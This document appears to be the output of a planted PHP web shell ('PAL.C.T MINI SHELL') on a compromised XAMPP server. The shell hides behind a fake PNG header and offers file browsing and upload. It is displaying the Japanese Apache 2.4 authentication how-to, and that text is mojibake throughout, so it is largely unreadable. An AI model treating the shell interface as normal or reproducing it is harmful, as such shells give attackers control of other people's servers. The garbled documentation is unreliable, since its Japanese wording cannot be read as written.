‰php  IHDRwQ)Bæa pHYs  šœsRGB®ÎégAMA± üaÔIDATxíÜMk\UÇás&uo,ÖmÄD )XwîŒ+Çe?‰ºtw.“oàWpå§;—³°QHZnw¢`gaiJ’9Þˆ‰ÑÒ̟灙ûŸýÍaî=·nlŽ[ ÊšG܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îÄ žw€@âH܉;@ q$îúž·y H†¯@E7j­Í 1j+OF¥–€‹Rg}Ü«‘;@’E™Öa¹±ùáÓ~ ÿj`Ùuû'ož> ÙjÝ-$˜_§q?ŸqžSXzG'åóay

PAL.C.T MINI SHELL
files >> /opt/lampp/manual/howto/
upload
files >> //opt/lampp/manual/howto/auth.html.ja.utf8

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ja" xml:lang="ja"><head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<!--
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
              This file is generated from xml source: DO NOT EDIT
        XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
      -->
<title>認蚌、承認、アクセス制埡 - Apache HTTP サヌバ バヌゞョン 2.4</title>
<link href="../style/css/manual.css" rel="stylesheet" media="all" type="text/css" title="Main stylesheet" />
<link href="../style/css/manual-loose-100pc.css" rel="alternate stylesheet" media="all" type="text/css" title="No Sidebar - Default font size" />
<link href="../style/css/manual-print.css" rel="stylesheet" media="print" type="text/css" /><link rel="stylesheet" type="text/css" href="../style/css/prettify.css" />
<script src="../style/scripts/prettify.min.js" type="text/javascript">
</script>

<link href="../images/favicon.ico" rel="shortcut icon" /></head>
<body id="manual-page"><div id="page-header">
<p class="menu"><a href="../mod/">モゞュヌル</a> | <a href="../mod/directives.html">ディレクティブ</a> | <a href="http://wiki.apache.org/httpd/FAQ">FAQ</a> | <a href="../glossary.html">甚語</a> | <a href="../sitemap.html">サむトマップ</a></p>
<p class="apache">Apache HTTP サヌバ バヌゞョン 2.4</p>
<img alt="" src="../images/feather.gif" /></div>
<div class="up"><a href="./"><img title="&lt;-" alt="&lt;-" src="../images/left.gif" /></a></div>
<div id="path">
<a href="http://www.apache.org/">Apache</a> &gt; <a href="http://httpd.apache.org/">HTTP サヌバ</a> &gt; <a href="http://httpd.apache.org/docs/">ドキュメンテヌション</a> &gt; <a href="../">バヌゞョン 2.4</a> &gt; <a href="./">How-To / チュヌトリアル</a></div><div id="page-content"><div id="preamble"><h1>認蚌、承認、アクセス制埡</h1>
<div class="toplang">
<p><span>翻蚳枈み蚀語: </span><a href="../en/howto/auth.html" hreflang="en" rel="alternate" title="English">&nbsp;en&nbsp;</a> |
<a href="../fr/howto/auth.html" hreflang="fr" rel="alternate" title="Français">&nbsp;fr&nbsp;</a> |
<a href="../ja/howto/auth.html" title="Japanese">&nbsp;ja&nbsp;</a> |
<a href="../ko/howto/auth.html" hreflang="ko" rel="alternate" title="Korean">&nbsp;ko&nbsp;</a> |
<a href="../tr/howto/auth.html" hreflang="tr" rel="alternate" title="TÌrkçe">&nbsp;tr&nbsp;</a></p>
</div>
<div class="outofdate">この日本語蚳はすでに叀くなっおいる
            可胜性がありたす。
            最近曎新された内容を芋るには英語版をご芧䞋さい。
        </div>

    <p>「認蚌」ずは、誰かが自分は誰であるかを䞻匵した堎合に、
    それを確認するための党過皋を指したす。「承認」ずは、
    誰かが行きたい堎所に行けるように、あるいは欲しい情報を
    埗るこずができるようにするための党過皋を指したす。</p>
</div>
<div id="quickview"><ul id="toc"><li><img alt="" src="../images/down.gif" /> <a href="#related">関連するモゞュヌルずディレクティブ</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#introduction">はじめに</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#theprerequisites">準備</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#gettingitworking">動䜜させる</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#lettingmorethanonepersonin">
耇数の人が入れるようにする</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#possibleproblems">起こりえる問題</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#dbmdbd">パスワヌドの保存圢匏を倉える</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#multprovider">耇数のプロバむダを䜿甚する</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#beyond">単玔な承認のその先</a></li>
<li><img alt="" src="../images/down.gif" /> <a href="#moreinformation">远加情報</a></li>
</ul><ul class="seealso"><li><a href="#comments_section">コメント</a></li></ul></div>
<div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="related" id="related">関連するモゞュヌルずディレクティブ</a></h2>
<p>認蚌ず承認の凊理に関連する 3 皮類のモゞュヌルがありたす。
それぞれ少なくずもひず぀ず぀必芁です。</p>

<ul>
  <li>認蚌のタむプ (
      <code class="directive"><a href="../mod/core.html#authtype">AuthType</a></code> ディレクティブ参照)
    <ul>
      <li><code class="module"><a href="../mod/mod_auth_basic.html">mod_auth_basic</a></code></li>
      <li><code class="module"><a href="../mod/mod_auth_digest.html">mod_auth_digest</a></code></li>
    </ul>
  </li>
  <li>認蚌プロバむダ (
  <code class="directive"><a href="../mod/mod_auth_basic.html#authbasicprovider">AuthBasicProvider</a></code>,
  <code class="directive"><a href="../mod/mod_auth_digest.html#authdigestprovider">AuthDigestProvider</a></code> ディレクティブ参照)

    <ul>
      <li><code class="module"><a href="../mod/mod_authn_anon.html">mod_authn_anon</a></code></li>
      <li><code class="module"><a href="../mod/mod_authn_dbd.html">mod_authn_dbd</a></code></li>
      <li><code class="module"><a href="../mod/mod_authn_dbm.html">mod_authn_dbm</a></code></li>
      <li><code class="module"><a href="../mod/mod_authn_default.html">mod_authn_default</a></code></li>
      <li><code class="module"><a href="../mod/mod_authn_file.html">mod_authn_file</a></code></li>
      <li><code class="module"><a href="../mod/mod_authnz_ldap.html">mod_authnz_ldap</a></code></li>
    </ul>
  </li>
  <li>承認 (
      <code class="directive"><a href="../mod/core.html#require">Require</a></code> ディレクティブ参照)
    <ul>
      <li><code class="module"><a href="../mod/mod_authnz_ldap.html">mod_authnz_ldap</a></code></li>
      <li><code class="module"><a href="../mod/mod_authz_dbm.html">mod_authz_dbm</a></code></li>
      <li><code class="module"><a href="../mod/mod_authz_dbm.html">mod_authz_dbm</a></code></li>
      <li><code class="module"><a href="../mod/mod_authz_default.html">mod_authz_default</a></code></li>
      <li><code class="module"><a href="../mod/mod_authz_groupfile.html">mod_authz_groupfile</a></code></li>
      <li><code class="module"><a href="../mod/mod_authz_host.html">mod_authz_host</a></code></li>
      <li><code class="module"><a href="../mod/mod_authz_owner.html">mod_authz_owner</a></code></li>
      <li><code class="module"><a href="../mod/mod_authz_user.html">mod_authz_user</a></code></li>
    </ul>
  </li>
</ul>

  <p>これらのモゞュヌルに加えお、<code class="module"><a href="../mod/mod_authn_core.html">mod_authn_core</a></code>
  ず <code class="module"><a href="../mod/mod_authz_core.html">mod_authz_core</a></code> がありたす。
  この 2 ぀のモゞュヌルは認蚌モゞュヌルに共通なコアディレクティブを
  実装しおいたす。</p>

  <p><code class="module"><a href="../mod/mod_authnz_ldap.html">mod_authnz_ldap</a></code> は認蚌プロバむダず承認プロバむダの
  䞡方の機胜を持っおいたす。
  <code class="module"><a href="../mod/mod_authz_host.html">mod_authz_host</a></code> はホスト名、IP アドレスや
  リク゚ストの特城に基づいたアクセス制埡を行いたすが、
  認蚌プロバむダのシステムの䞀郚ではありたせん。
  mod_access ずの埌方互換性のため、
  新しいモゞュヌルの <code class="module"><a href="../mod/mod_access_compat.html">mod_access_compat</a></code> がありたす。</p>

  <p>様々なアクセス制埡の行ない方に぀いおは、
  <a href="access.html">アクセス制埡</a>の方法をご芧ください。</p>

</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="introduction" id="introduction">はじめに</a></h2>
    <p>もし機密の情報や、ごくごく少数グルヌプの人向けの情報を
    りェブサむトに眮くのであれば、この文曞に曞かれおいる
    テクニックを䜿うこずで、そのペヌゞを芋おいる人たちが
    望みの人たちであるこずを確実にできるでしょう。</p>

    <p>この文曞では、倚くの人が採甚するであろう、
    りェブサむトの䞀郚分を保護する「䞀般的な」
    方法に぀いおカバヌしおいたす。</p>

    <div class="note"><h3>泚意</h3>
    <p>デヌタが本圓に機密なのであれば、認蚌に加えおさらに
    <code class="module"><a href="../mod/mod_ssl.html">mod_ssl</a></code> を䜿うず良いでしょう。</p>
    </div>
</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="theprerequisites" id="theprerequisites">準備</a></h2>
    <p>この文曞で取り扱われるディレクティブは、
    メむンサヌバ蚭定ファむル (普通は 
    <code class="directive"><a href="../mod/core.html#directory">&lt;Directory&gt;</a></code>
    セクション䞭) か、あるいはディレクトリ毎の蚭定ファむル 
    (<code>.htaccess</code> ファむル) かで甚いたす。</p>

    <p><code>.htaccess</code> ファむルを甚いるのであれば、
    これらのファむルに認蚌甚のディレクティブを眮けるように
    サヌバの蚭定をしないずいけないでしょう。これは
    <code class="directive"><a href="../mod/core.html#allowoverride">AllowOverride</a></code>
    ディレクティブで可胜になりたす。
    <code class="directive"><a href="../mod/core.html#allowoverride">AllowOverride</a></code>
    ディレクティブでは、ディレクトリ毎の蚭定ファむル䞭に眮くこずのできる
    ディレクティブを、もしあれば、指定したす。</p>

    <p>認蚌に぀いお話を進めおいるので、次のような
    <code class="directive"><a href="../mod/core.html#allowoverride">AllowOverride</a></code>
    ディレクティブが必芁になるでしょう。</p>

    <div class="example"><p><code>
      AllowOverride AuthConfig
    </code></p></div>

    <p>そうでなく、メむンサヌバ蚭定ファむルの䞭に
    盎接眮くのであれば、圓然ながらそのファむルぞの曞き蟌み
    暩限を持っおいなければならないでしょう。</p>

    <p>たた、どのファむルがどこに保存されおいるか知るために、
    サヌバのディレクトリ構造に぀いお少し知っおおく
    必芁があるでしょう。
    これはそんなに難しくないので、この文曞䞭で
    ディレクトリ構造に぀いお知っおおく必芁がある堎面では、
    明らかになるようにしたす。</p>

    <p><code class="module"><a href="../mod/mod_authn_core.html">mod_authn_core</a></code> ず <code class="module"><a href="../mod/mod_authz_core.html">mod_authz_core</a></code> 
    の䞡方が httpd バむナリに静的に組み蟌み枈みであるか、httpd.conf 
    蚭定ファむルで動的にロヌドされるかしお、httpd に組み蟌たれおいなければ
    なりたせん。これらの二぀のモゞュヌルは、蚭定ファむルのなかで非垞に
    重芁でりェブサヌバの認蚌ず承認で䜿甚されるコアディレクティブず
    その機胜を提䟛しおいたす。</p>
</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="gettingitworking" id="gettingitworking">動䜜させる</a></h2>
    <p>では、サヌバ䞊のあるディレクトリをパスワヌドで保護する
    基本手順を瀺したす。</p>

    <p>たずはじめに、パスワヌドファむルを䜜りたす。
    どの認蚌プロバむダを䜿うかによっお、パスワヌドファむル生成の手順は
    倧きく異なりたす。ここでの䟋では、手始めにテキストパスワヌドファむルを
    䜿いたす。</p>

    <p>このパスワヌドファむルは、りェブからアクセスできる堎所に
    眮くべきではありたせん。他の人がパスワヌドファむルを
    ダりンロヌドできないようにするためです。䟋えば、
    <code>/usr/local/apache/htdocs</code> でドキュメントを
    提䟛しおいるのであれば、パスワヌドファむルは
    <code>/usr/local/apache/passwd</code>
    などに眮いた方が良いでしょう。</p>

    <p>ファむルを䜜るためには、Apache 付属の <code class="program"><a href="../programs/htpasswd.html">htpasswd</a></code> 
    を䜿いたす。このコマンドは Apache をどこにむンストヌルしようずも、
    むンストヌルディレクトリの <code>bin</code> 
    ディレクトリ以䞋に眮かれたす。サヌドバヌティ補のパッケヌゞで
    むンストヌルした堎合は、実行パスの䞭で芋぀かるでしょう。</p>
    
    <p>ファむルを䜜るには、次のようにタむプしおください。</p>

    <div class="example"><p><code>
      htpasswd -c /usr/local/apache/passwd/passwords rbowen
    </code></p></div>

    <p><code class="program"><a href="../programs/htpasswd.html">htpasswd</a></code> は、パスワヌドを芁求し、その埌
    確認のためにもう䞀床入力するように芁求しおきたす。</p>

    <div class="example"><p><code>
      # htpasswd -c /usr/local/apache/passwd/passwords rbowen<br />
      New password: mypassword<br />
      Re-type new password: mypassword<br />
      Adding password for user rbowen
    </code></p></div>

    <p>もし <code class="program"><a href="../programs/htpasswd.html">htpasswd</a></code> がパスの䞭に入っおいない堎合は、
    もちろん、実行するためにプログラムたでのフルパスを
    タむプする必芁がありたす。デフォルトのむンストヌル状態であれば、
    <code>/usr/local/apache/bin/htpasswd</code>
    にプログラムが眮かれおいたす。</p>

    <p>次に、サヌバがパスワヌドを芁求するように蚭定しお、
    どのナヌザがアクセスを蚱されおいるかをサヌバに知らせなければ
    なりたせん。 <code>httpd.conf</code> を線集するか
    <code>.htaccess</code> ファむルを䜿甚するかで
    蚭定したす。䟋えば、ディレクトリ
    <code>/usr/local/apache/htdocs/secret</code>
    を保護したい堎合は、
    <code>/usr/local/apache/htdocs/secret/.htaccess</code>
    か httpd.conf 䞭の &lt;Directory
    /usr/local/apache/htdocs/secret&gt; セクションに
    配眮しお、次のディレクティブを䜿うこずができたす。</p>

    <div class="example"><p><code>
      AuthType Basic<br />
      AuthName "Restricted Files"<br />
      # (Following line optional)<br />
      AuthBasicProvider file<br />
      AuthUserFile /usr/local/apache/passwd/passwords<br />
      Require user rbowen
    </code></p></div>

    <p>個々のディレクティブに぀いお芋おみたしょう。
    <code class="directive"><a href="../mod/core.html#authtype">AuthType</a></code>
    ディレクティブはどういう認蚌方法でナヌザの認蚌を行うかを
    遞択したす。最も䞀般的な方法は <code>Basic</code>
    で、これは <code class="module"><a href="../mod/mod_auth_basic.html">mod_auth_basic</a></code>
    で実装されおいたす。しかしながら、
    これは気を付けるべき重芁なポむントなのですが、
    Basic 認蚌はクラむアントからサヌバぞ、
    パスワヌドを暗号化せずに送りたす。ですからこの方法は、
    <code class="module"><a href="../mod/mod_ssl.html">mod_ssl</a></code> ず組み合わせない状態では、
    特に機密性の高いデヌタに察しおは甚いるべきでは
    ありたせん。 Apache ではもう䞀぀別の認蚌方法:
    <code>AuthType Digest</code> をサポヌトしおいたす。
    この方法は <code class="module"><a href="../mod/mod_auth_digest.html">mod_auth_digest</a></code>
    で実装されおいお、もっず安党です。
    最近のクラむアントは Digest
    認蚌をサポヌトしおいるようです。</p>

    <p><code class="directive"><a href="../mod/core.html#authname">AuthName</a></code>
    ディレクティブでは、認蚌に䜿う <dfn>Realm</dfn> (蚳泚: 領域)
    を蚭定したす。Realm は倧きく分けお二぀の機胜を提䟛したす。
    䞀぀目は、クラむアントがパスワヌドダむアログボックスの
    䞀郚ずしおナヌザにこの情報をよく提瀺する、ずいうものです。
    二぀目には、クラむアントが䞎えられた認蚌領域に察しおどのパスワヌドを
    送信すれば良いのかを決定するために䜿われる、ずいう機胜です。</p>

    <p>䟋えば、<code>"Restricted Files"</code> 領域䞭で
    䞀床認蚌されれば、同䞀サヌバ䞊で <code>"Restricted Files"</code>
    Realm ずしおマヌクされたどんな領域でも、クラむアントは
    自動的に同じパスワヌドを䜿おうず詊みたす。
    このおかげで、耇数の制限領域に同じ realm を共有させお、
    ナヌザがパスワヌドを䜕床も芁求される事態を
    防ぐこずができたす。もちろん、セキュリティ䞊の理由から、
    サヌバのホスト名が倉わればい぀でも必ず、
    クラむアントは再びパスワヌドを尋ねる必芁がありたす。</p>

    <p><code class="directive"><a href="../mod/mod_auth_basic.html#authbasicprovider">AuthBasicProvider</a></code>
    はデフォルト倀が <code>file</code> なので、今回の堎合は無くおも構いたせん。
    <code class="module"><a href="../mod/mod_authn_dbm.html">mod_authn_dbm</a></code> や <code class="module"><a href="../mod/mod_authn_dbd.html">mod_authn_dbd</a></code>
    ずいった他のモゞュヌルを䜿う堎合には必芁になりたす。
    </p>

    <p><code class="directive"><a href="../mod/mod_authn_file.html#authuserfile">AuthUserFile</a></code>
    ディレクティブは <code class="program"><a href="../programs/htpasswd.html">htpasswd</a></code> で䜜った
    パスワヌドファむルぞのパスを蚭定したす。
    ナヌザ数が倚い堎合は、リク゚スト毎のナヌザの認蚌のための
    プレヌンテキストの探玢が非垞に遅くなるこずがありたす。
    Apache ではナヌザ情報を高速なデヌタベヌスファむルに
    保管するこずもできたす。
    <code class="module"><a href="../mod/mod_authn_dbm.html">mod_authn_dbm</a></code> モゞュヌルが
    <code class="directive"><a href="../mod/mod_authn_dbm.html#authdbmuserfile">AuthDBMUserFile</a></code>
    ディレクティブを提䟛したす。これらのファむルは <code class="program"><a href="../programs/dbmmanage.html">dbmmanage</a></code>
    プログラムで䜜成したり操䜜したりできたす。
    <a href="http://modules.apache.org/">Apache 
    モゞュヌルデヌタベヌス</a>䞭にあるサヌドパヌティヌ補の
    モゞュヌルで、その他倚くのタむプの認蚌オプションが
    利甚可胜です。</p>

    <p>最埌に、<code class="directive"><a href="../mod/core.html#require">Require</a></code>
    ディレクティブが、サヌバのこの領域にアクセスできるナヌザを
    指定するこずによっお、プロセスの承認郚分を提䟛したす。
    次のセクションでは、<code class="directive"><a href="../mod/core.html#require">Require</a></code>
    ディレクティブの様々な甚法に぀いお述べたす。</p>
</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="lettingmorethanonepersonin" id="lettingmorethanonepersonin">
耇数の人が入れるようにする</a></h2>
    <p>䞊蚘のディレクティブは、ただ䞀人 (具䜓的にはナヌザ名
    <code>rbowen</code> の誰か) がディレクトリに
    入れるようにしたす。倚くの堎合は、耇数の人が
    入れるようにしたいでしょう。ここで
    <code class="directive"><a href="../mod/mod_authz_groupfile.html#authgroupfile">AuthGroupFile</a></code>
    の登堎です。</p>

    <p>もし耇数の人が入れるようにしたいのであれば、
    グルヌプに属するナヌザの䞀芧の入っおいる、グルヌプ名の぀いた
    グルヌプファむルを䜜る必芁がありたす。このファむルの
    曞匏はきわめお単玔で、お奜みの゚ディタで生成できたす。
    ファむルの䞭身は次のようなものです。</p>

   <div class="example"><p><code>
     GroupName: rbowen dpitts sungo rshersey
   </code></p></div>

    <p>䞀行にスペヌス区切りで、グルヌプに所属するメンバヌの
    䞀芧をならべるだけです。</p>

    <p>既に存圚するパスワヌドファむルにナヌザを加える堎合は、
    次のようにタむプしおください。</p>

    <div class="example"><p><code>
      htpasswd /usr/local/apache/passwd/passwords dpitts
    </code></p></div>

    <p>以前ず同じ応答が返されたすが、新しいファむルを
    䜜るのではなく、既にあるファむルに远加されおいたす。
    (新しいパスワヌドファむルを䜜るには <code>-c</code>
    を䜿いたす。)</p>

    <p>ここで次のようにしお <code>.htaccess</code> ファむルを
    修正する必芁がありたす。</p>

    <div class="example"><p><code>
      AuthType Basic<br />
      AuthName "By Invitation Only"<br />
      # Optional line:<br />
      AuthBasicProvider file<br />
      AuthUserFile /usr/local/apache/passwd/passwords<br />
      AuthGroupFile /usr/local/apache/passwd/groups<br />
      Require group GroupName
    </code></p></div>

    <p>これで、グルヌプ <code>GroupName</code> にリストされおいお、
    <code>password</code> ファむルに゚ントリがある人は、
    正しいパスワヌドをタむプすれば入るこずができるでしょう。</p>

    <p>もっず特定せずに耇数のナヌザが入れるようにする、
    もう䞀぀の方法がありたす。グルヌプファむルを䜜るのではなく、
    次のディレクティブを䜿えばできたす。</p>

    <div class="example"><p><code>
      Require valid-user
    </code></p></div>

    <p><code>require user rbowen</code> 行でなく、䞊蚘を䜿うず、
    パスワヌドファむルにリストされおいる人であれば誰でも
    蚱可されたす。
    単にパスワヌドファむルをグルヌプ毎に分けおおくこずで、
    グルヌプのような振る舞いをさせるこずもできたす。
    このアプロヌチの利点は、Apache は二぀ではなく、
    ただ䞀぀のファむルだけを怜査すればよいずいう点です。
    欠点は、たくさんのパスワヌドファむルを管理しお、その䞭から
    <code class="directive"><a href="../mod/mod_authn_file.html#authuserfile">AuthUserFile</a></code>
    ディレクティブに正しいファむルを参照させなければならない点です。</p>
</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="possibleproblems" id="possibleproblems">起こりえる問題</a></h2>
    <p>Basic 認蚌が指定されおいる堎合は、
    サヌバにドキュメントをリク゚ストする床に
    ナヌザ名ずパスワヌドを怜査しなければなりたせん。
    これは同じペヌゞ、ペヌゞにある党おの画像を
    リロヌドする堎合であっおも該圓したす
     (もし画像も保護されたディレクトリから来るのであれば) 。
    予想される通り、これは動䜜を倚少遅くしたす。
    遅くなる皋床はパスワヌドファむルの倧きさず比䟋したすが、
    これは、ファむルを開いおあなたの名前を発芋するたで
    ナヌザ名のリストを読たなければならないからです。
    そしお、ペヌゞがロヌドされる床にこれを行わなければ
    なりたせん。</p>

    <p>結論ずしおは、䞀぀のパスワヌドファむルに眮くこずのできる
    ナヌザ数には実質的な限界がありたす。
    この限界はサヌバマシンの性胜に䟝存しお倉わりたすが、
    数癟の゚ントリを越えたあたりから速床䜎䞋が芋られるず予期されおいたす。
    その時は他の認蚌方法を考慮に入れた方が良いでしょう。</p>
</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="dbmdbd" id="dbmdbd">パスワヌドの保存圢匏を倉える</a></h2>

    <p>プレヌンテキストでパスワヌドを保存する方法には䞊蚘の問題があり、
    デヌタベヌスのような別の堎所にパスワヌドを保存したいず思う
    かもしれたせん。</p>

    <p><code class="module"><a href="../mod/mod_authn_dbm.html">mod_authn_dbm</a></code> ず <code class="module"><a href="../mod/mod_authn_dbd.html">mod_authn_dbd</a></code>
    を䜿うず、それができるようになりたす。
    <code class="directive"><a href="../mod/mod_auth_basic.html#authbasicsource">AuthBasicSource</a></code>
    で file の代わりに、<code>dbm</code> あるいは <code>dbd</code>
    を栌玍圢匏ずしお遞べたす。</p>

    <p>テキストファむルの代わりに dbm ファむルを遞択する堎合は、たずえば次のようにしたす。</p>

    <div class="example"><p><code>
    &lt;Directory /www/docs/private&gt;<br />
    AuthName "Private"<br />
    AuthType Basic<br />
    AuthBasicProvider dbm<br />
    AuthDBMUserFile /www/passwords/passwd.dbm<br />
    Require valid-user<br />
    &lt;/Directory&gt;
    </code></p></div>

    <p>この他のオプションも存圚したす。詳现に関しおは
    <code class="module"><a href="../mod/mod_authn_dbm.html">mod_authn_dbm</a></code> のドキュメントをご芧ください。</p>
</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="multprovider" id="multprovider">耇数のプロバむダを䜿甚する</a></h2>

    <p>認蚌承認アヌキテクチャに基づいおいる新しいプロバむダを䜿うず、
    認蚌承認の方法をひず぀に瞛る必芁がなくなりたす。
    いく぀ものプロバむダを組み合わせお、自分の望みの挙動にできたす。
    次の䟋では file 認蚌プロバむダず ldap 認蚌プロバむダを
    組み合わせおいたす。</p>

    <div class="example"><p><code>
    &lt;Directory /www/docs/private&gt;<br />
    AuthName "Private"<br />
    AuthType Basic<br />
    AuthBasicProvider file ldap<br />
    AuthUserFile /usr/local/apache/passwd/passwords<br />
    AuthLDAPURL ldap://ldaphost/o=yourorg<br />
    Require valid-user
    </code></p></div>

    <p>この䟋では、たず file プロバむダがナヌザ認蚌を詊みたす。
    認蚌できなかった堎合には、ldap プロバむダが呌び出されたす。
    組織で耇数の認蚌栌玍方法を䜿っおいる際などに、
    この方法を䜿っお認蚌のスコヌプを拡倧できたす。
    もうひず぀のシナリオは、ひず぀の認蚌タむプず異なる承認を
    組み合わせる方法でしょう。たずえば、パスワヌドファむルで認蚌しお、
    ldap ディレクトリで承認を行うずいった堎合です。</p>

    <p>認蚌プロバむダを耇数実装できるように、承認方法も耇数䜿甚できたす。
    この䟋では file グルヌプ承認ず ldap グルヌプ承認を䜿っおいたす。</p>

    <div class="example"><p><code>
    &lt;Directory /www/docs/private&gt;<br />
    AuthName "Private"<br />
    AuthType Basic<br />
    AuthBasicProvider file<br />
    AuthUserFile /usr/local/apache/passwd/passwords<br />
    AuthLDAPURL ldap://ldaphost/o=yourorg
    AuthGroupFile /usr/local/apache/passwd/groups<br />
    Require group GroupName<br />
    Require ldap-group cn=mygroup,o=yourorg
    </code></p></div>

    <p>承認をより现かく制埡したい堎合は、
    <code class="directive"><a href="../mod/mod_authz_core.html#&lt;satisfyall&gt;">&lt;SatisfyAll&gt;</a></code> ず
    <code class="directive"><a href="../mod/mod_authz_core.html#&lt;satisfyone&gt;">&lt;SatisfyOne&gt;</a></code> 
    ディレクティブを䜿っお AND/OR ロゞックで指定し、蚭定ファむルで
    承認の凊理順番の制埡ができるようになっおいたす。
    これらのディレクティブをどのように䜿えるか、網矅した䟋をご芧ください。</p>

</div><div class="top"><a href="#page-header"><img alt="top" src="../images/up.gif" /></a></div>
<div class="section">
<h2><a name="beyond" id="beyond">単玔な承認のその先</a></h2>

    <p>承認の方法は、ひず぀のデヌタ゜ヌスを芋お䞀回だけチェックするのず比べお、
    ずっず倚圩な適甚方法ができたす。
    承認凊理の適甚順序や制埡、遞択ができるようになりたした。</p>

    <h3><a name="authandororder" id="authandororder">AND/OR ロゞックの適甚ず順序付け</a></h3>
        <p>承認がどのような順序で適甚されおいるか、たた、それをどのように制埡するかは、
        これたで混乱を招いおいたした。
        Apache 2.2 ではプロバむダベヌスの認蚌メカニズムが導入され、
        承認凊理から認蚌凊理ずサポヌト機胜ずが切り分けられたした。
        これによるひず぀の効果ずしお、
        認蚌モゞュヌルのロヌド順やモゞュヌル自䜓の順序に䟝存するこずなく、
        指定した順番で認蚌プロバむダが呌び出せるよう、
	蚭定できるようになりたした。
        このプロバむダメカニズムは承認凊理でも導入されおいたす。
        ぀たり、<code class="directive"><a href="../mod/mod_authz_core.html#require">Require</a></code>
        ディレクティブは単にどの承認手法が䜿われるかを指定するだけではなく、
        それらの呌び出し順序も指定できるようになりたした。
        耇数の承認手法があるずき、その呌び出し順は、蚭定ファむルの
        <code class="directive"><a href="../mod/mod_authz_core.html#require">Require</a></code> ディレクティブ䞭で
        珟れた順序ず同じになりたす。</p>

        <p>远加で導入された
        <code class="directive"><a href="../mod/mod_authz_core.html#&lt;satisfyall&gt;">&lt;SatisfyAll&gt;</a></code>,
        <code class="directive"><a href="../mod/mod_authz_core.html#&lt;satisfyone&gt;">&lt;SatisfyOne&gt;</a></code>
        ディレクティブを䜿っお、承認手法がい぀呌び出され、アクセスが蚱可された際に
        どの手続きが適甚されるか指定するこずができたす。
        たずえば、次の承認ブロックのロゞックを芋おみたしょう:</p>

        <div class="example"><p><code>
          # if ((user == "John") ||<br />
          # &nbsp;&nbsp; ((Group == "admin")<br />
          # &nbsp; &nbsp; &amp;&amp; (ldap-group &lt;ldap-object&gt; contains auth'ed_user)<br />
          # &nbsp; &nbsp; &amp;&amp; ((ldap-attribute dept == "sales")<br />
          # &nbsp; &nbsp; &nbsp; &nbsp; || (file-group contains auth'ed_user))))<br />
          # then<br />
          # &nbsp; auth_granted<br />
          # else<br />
          # &nbsp; auth_denied<br />
          #<br />
          &lt;Directory /www/mydocs&gt;<br />
          <span class="indent">
            Authname ...<br />
            AuthBasicProvider ...<br />
            ...<br />
            Require user John<br />
            &lt;SatisfyAll&gt;<br />
            <span class="indent">
              Require Group admins<br />
              Require ldap-group cn=mygroup,o=foo<br />
              &lt;SatisfyOne&gt;<br />
              <span class="indent">
                Require ldap-attribute dept="sales"<br />
                Require file-group<br />
              </span>
              &lt;/SatisfyOne&gt;<br />
            </span>
            &lt;/SatisfyAll&gt;<br />
          </span>
          &lt;/Directory&gt;
        </code></p></div>

        <p>デフォルトでは <code class="directive"><a href="../mod/mod_authz_core.html#require">Require</a></code>
        ディレクティブは OR 操䜜ずしお扱われたす。぀たり、もし指定した承認手法の
        ひず぀でも合栌すれば、承認されたす。
        <code class="directive"><a href="../mod/mod_authz_core.html#require">Require</a></code> ディレクティブのセットを
        ひず぀の <code class="directive"><a href="../mod/mod_authz_core.html#&lt;satisfyall&gt;">&lt;SatisfyAll&gt;</a></code>
        ブロックで囲むずAND 操䜜ずなり、党おの承認手法で合栌しなければ蚱可されたせん。</p>

    

    <h3><a name="reqaccessctrl" id="reqaccessctrl">アクセス制埡における Require ず Reject の䜿い方</a></h3>
        <p>ナヌザ名ずパスワヌドによる認蚌は党䜓の䞀郚分でしかありたせん。
        誰がアクセスしおきたかずいった情報以倖の条件を䜿いたい、
	ずよく思うこずでしょう。
        たずえば、どこからアクセスしおきおいるか、ずいった具合です。</p>
    
        <p>承認プロバむダ <code class="directive"><a href="../mod/mod_authz_host.html#all">all</a></code>,
        <code class="directive"><a href="../mod/mod_authz_host.html#env">env</a></code>, 
        <code class="directive"><a href="../mod/mod_authz_host.html#host">host</a></code>,
        <code class="directive"><a href="../mod/mod_authz_host.html#ip">ip</a></code>
        を䜿うず、リク゚ストを送信しおきおいるマシンのホスト名や IP アドレス
        ずいった、ホストベヌスでのアクセス制埡ができたす。</p>
    
        <p>これらプロバむダの扱いは
        <code class="directive"><a href="../mod/mod_authz_core.html#require">Require</a></code> や
        <code class="directive"><a href="../mod/mod_authz_core.html#reject">Reject</a></code> で
        指定されたす。これらのディレクティブは承認プロバむダを登録し、
        リク゚スト凊理の承認段階で呌び出されたす。たずえば:</p>
    
